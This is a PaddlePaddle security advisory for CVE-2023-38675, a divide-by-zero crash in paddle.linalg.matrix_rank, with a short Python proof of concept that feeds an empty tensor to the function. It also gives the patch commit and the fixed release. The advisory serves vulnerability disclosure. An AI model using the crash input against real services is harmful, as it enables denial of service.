## PDSA-2023-007: FPE in paddle.linalg.matrix_rank ### CVE Number CVE-2023-38675 ### Impact When `x` dim calculates `rows` or `cols` to 0, `paddle.linalg.matrix_rank` triggers FPE by `numel / (rows * cols)`. The PoC is as follows: ```python import paddle import numpy as np x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32) x = paddle.to_tensor(x) paddle.linalg.matrix_rank(x) ``` ### Patches We have patched the issue in commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1). The fix will be included in PaddlePaddle 2.6.0. ### For more information Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Tong Liu of ShanghaiTech University.